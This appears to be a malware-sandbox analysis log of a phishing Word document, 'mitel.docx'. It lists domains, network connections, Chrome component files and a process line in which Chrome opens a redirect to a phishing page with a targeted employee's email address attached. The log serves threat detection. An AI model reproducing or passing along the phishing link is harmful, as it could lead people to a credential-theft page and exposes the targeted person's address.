Source: sets.json.7.dr	String found in binary or memory: https://player.pl
Source: sets.json.7.dr	String found in binary or memory: https://plejada.pl
Source: sets.json.7.dr	String found in binary or memory: https://poalim.site
Source: sets.json.7.dr	String found in binary or memory: https://poalim.xyz
Source: sets.json.7.dr	String found in binary or memory: https://pomponik.pl
Source: sets.json.7.dr	String found in binary or memory: https://portalinmobiliario.com
Source: sets.json.7.dr	String found in binary or memory: https://prisjakt.no
Source: sets.json.7.dr	String found in binary or memory: https://pudelek.pl
Source: sets.json.7.dr	String found in binary or memory: https://punjabijagran.com
Source: sets.json.7.dr	String found in binary or memory: https://radio1.be
Source: sets.json.7.dr	String found in binary or memory: https://radio2.be
Source: sets.json.7.dr	String found in binary or memory: https://reactor.cc
Source: sets.json.7.dr	String found in binary or memory: https://repid.org
Source: sets.json.7.dr	String found in binary or memory: https://reshim.org
Source: sets.json.7.dr	String found in binary or memory: https://rws1nvtvt.com
Source: sets.json.7.dr	String found in binary or memory: https://rws2nvtvt.com
Source: sets.json.7.dr	String found in binary or memory: https://rws3nvtvt.com
Source: sets.json.7.dr	String found in binary or memory: https://sackrace.ai
Source: sets.json.7.dr	String found in binary or memory: https://salemoveadvisor.com
Source: sets.json.7.dr	String found in binary or memory: https://salemovefinancial.com
Source: sets.json.7.dr	String found in binary or memory: https://salemovetravel.com
Source: sets.json.7.dr	String found in binary or memory: https://samayam.com
Source: sets.json.7.dr	String found in binary or memory: https://sapo.io
Source: sets.json.7.dr	String found in binary or memory: https://sapo.pt
Source: sets.json.7.dr	String found in binary or memory: https://shock.co
Source: sets.json.7.dr	String found in binary or memory: https://smaker.pl
Source: sets.json.7.dr	String found in binary or memory: https://smoney.vn
Source: sets.json.7.dr	String found in binary or memory: https://smpn106jkt.sch.id
Source: sets.json.7.dr	String found in binary or memory: https://socket-to-me.vip
Source: sets.json.7.dr	String found in binary or memory: https://songshare.com
Source: sets.json.7.dr	String found in binary or memory: https://songstats.com
Source: sets.json.7.dr	String found in binary or memory: https://sporza.be
Source: sets.json.7.dr	String found in binary or memory: https://standardsandpraiserepurpose.com
Source: sets.json.7.dr	String found in binary or memory: https://startlap.hu
Source: sets.json.7.dr	String found in binary or memory: https://startupislandtaiwan.com
Source: sets.json.7.dr	String found in binary or memory: https://startupislandtaiwan.net
Source: sets.json.7.dr	String found in binary or memory: https://startupislandtaiwan.org
Source: sets.json.7.dr	String found in binary or memory: https://stripe.com
Source: sets.json.7.dr	String found in binary or memory: https://stripe.network
Source: sets.json.7.dr	String found in binary or memory: https://stripecdn.com
Source: sets.json.7.dr	String found in binary or memory: https://supereva.it
Source: sets.json.7.dr	String found in binary or memory: https://takeabreak.co.uk
Source: sets.json.7.dr	String found in binary or memory: https://talkdeskqaid.com
Source: sets.json.7.dr	String found in binary or memory: https://talkdeskstgid.com
Source: sets.json.7.dr	String found in binary or memory: https://teacherdashboard.com
Source: sets.json.7.dr	String found in binary or memory: https://technology-revealed.com
Source: sets.json.7.dr	String found in binary or memory: https://terazgotuje.pl
Source: sets.json.7.dr	String found in binary or memory: https://text.com
Source: sets.json.7.dr	String found in binary or memory: https://textyserver.appspot.com
Source: sets.json.7.dr	String found in binary or memory: https://the42.ie
Source: sets.json.7.dr	String found in binary or memory: https://thejournal.ie
Source: sets.json.7.dr	String found in binary or memory: https://thirdspace.org.au
Source: sets.json.7.dr	String found in binary or memory: https://timesinternet.in
Source: sets.json.7.dr	String found in binary or memory: https://timesofindia.com
Source: sets.json.7.dr	String found in binary or memory: https://tolteck.app
Source: sets.json.7.dr	String found in binary or memory: https://tolteck.com
Source: sets.json.7.dr	String found in binary or memory: https://top.pl
Source: sets.json.7.dr	String found in binary or memory: https://tribunnews.com
Source: sets.json.7.dr	String found in binary or memory: https://trytalkdesk.com
Source: sets.json.7.dr	String found in binary or memory: https://tucarro.com
Source: sets.json.7.dr	String found in binary or memory: https://tucarro.com.co
Source: sets.json.7.dr	String found in binary or memory: https://tucarro.com.ve
Source: sets.json.7.dr	String found in binary or memory: https://tvid.in
Source: sets.json.7.dr	String found in binary or memory: https://tvn.pl
Source: sets.json.7.dr	String found in binary or memory: https://tvn24.pl
Source: sets.json.7.dr	String found in binary or memory: https://unotv.com
Source: sets.json.7.dr	String found in binary or memory: https://victorymedium.com
Source: sets.json.7.dr	String found in binary or memory: https://vrt.be
Source: sets.json.7.dr	String found in binary or memory: https://vwo.com
Source: sets.json.7.dr	String found in binary or memory: https://welt.de
Source: sets.json.7.dr	String found in binary or memory: https://wieistmeineip.de
Source: sets.json.7.dr	String found in binary or memory: https://wildix.com
Source: sets.json.7.dr	String found in binary or memory: https://wildixin.com
Source: sets.json.7.dr	String found in binary or memory: https://wingify.com
Source: sets.json.7.dr	String found in binary or memory: https://wordle.at
Source: sets.json.7.dr	String found in binary or memory: https://wp.pl
Source: sets.json.7.dr	String found in binary or memory: https://wpext.pl
Source: sets.json.7.dr	String found in binary or memory: https://www.asadcdn.com
Source: sets.json.7.dr	String found in binary or memory: https://ya.ru
Source: sets.json.7.dr	String found in binary or memory: https://yours.co.uk
Source: sets.json.7.dr	String found in binary or memory: https://zalo.me
Source: sets.json.7.dr	String found in binary or memory: https://zdrowietvn.pl
Source: sets.json.7.dr	String found in binary or memory: https://zingmp3.vn
Source: sets.json.7.dr	String found in binary or memory: https://zoom.com
Source: sets.json.7.dr	String found in binary or memory: https://zoom.us

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56019
Source: unknown	Network traffic detected: HTTP traffic on port 56022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56022
Source: unknown	Network traffic detected: HTTP traffic on port 56019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 56017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56013
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49944 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:56013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:56019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:56022 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_487111238	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_487111238\sets.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_487111238\manifest.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_487111238\LICENSE	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_487111238\_metadata\	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_487111238\_metadata\verified_contents.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_487111238\manifest.fingerprint	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_689616758	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_689616758\Google.Widevine.CDM.dll	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_689616758\manifest.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_689616758\_metadata\	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_689616758\_metadata\verified_contents.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_689616758\manifest.fingerprint	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_1938143637	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_1938143637\cr_en-us_500000_index.bin	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_1938143637\manifest.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_1938143637\_metadata\	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_1938143637\_metadata\verified_contents.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_1938143637\manifest.fingerprint	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_594061853	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_594061853\keys.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_594061853\manifest.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_594061853\LICENSE	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_594061853\_metadata\	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_594061853\_metadata\verified_contents.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_594061853\manifest.fingerprint	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_872989902	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_872989902\LICENSE.txt	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_872989902\Filtering Rules	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_872989902\manifest.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_872989902\_metadata\	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_872989902\_metadata\verified_contents.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_872989902\manifest.fingerprint	Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\chrome_BITS_1924_506915425

Jump to behavior

Source: Google.Widevine.CDM.dll.7.dr

Static PE information: Number of sections : 12 > 10

Source: classification engine

Classification label: mal56.phis.troj.winDOCX@23/26@10/8

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\Desktop\~$mitel.docx

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{6B393C49-0FD8-4EBB-86DB-123E332D2604} - OProcSessId.dat

Jump to behavior

Source: mitel.docx

OLE indicator, Word Document stream: true

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://app.supercast.com/ahoy/messages/IyOwn1xl2n6XdxToR2XV5dCRxhEvflsH/click?signature=96e743b76714148502315415a04739f234047e43&url=https://rubytech.xyz/0secure/index.html#ludmila.glinberg+mitel.com
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2004,i,9731163135795558546,14858756652436041549,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2004,i,9731163135795558546,14858756652436041549,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source:

Binary string: Google.Widevine.CDM.dll.pdb source: Google.Widevine.CDM.dll.7.dr

Source: mitel.docx

Initial sample: OLE indicators vbamacros = False

Source: Google.Widevine.CDM.dll.7.dr	Static PE information: section name: .00cfg
Source: Google.Widevine.CDM.dll.7.dr	Static PE information: section name: .gxfg
Source: Google.Widevine.CDM.dll.7.dr	Static PE information: section name: .retplne
Source: Google.Widevine.CDM.dll.7.dr	Static PE information: section name: .voltbl
Source: Google.Widevine.CDM.dll.7.dr	Static PE information: section name: _RDATA

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_689616758\Google.Widevine.CDM.dll

Jump to dropped file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_689616758\Google.Widevine.CDM.dll

Jump to dropped file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_872989902\LICENSE.txt

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
